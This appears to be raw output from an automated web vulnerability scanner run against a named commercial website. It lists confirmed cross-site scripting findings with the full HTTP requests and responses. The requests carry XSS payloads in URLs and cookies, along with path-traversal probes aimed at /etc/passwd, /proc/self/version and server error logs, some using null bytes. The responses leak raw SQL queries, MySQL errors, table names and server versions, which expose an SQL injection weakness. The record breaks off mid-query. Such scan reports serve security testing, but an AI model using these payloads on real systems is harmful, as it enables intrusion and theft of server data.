nsextt GET '"--></style></script><script>alert(0x0004F6)</script>

Request

GET /ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004F6)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4fk2qmcq53beqjoabeifsnm3e7; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catI' at line 5
- /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000542)</script>

Request

GET /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000542)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=takhlbbrch3l1oq05bjijkh6h3; path=/
Content-Length: 2793
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = 
''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000542)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E

/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00050F)</script>

Request

GET /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00050F)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bbbvqbpg7vhm99en4nklktb935; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 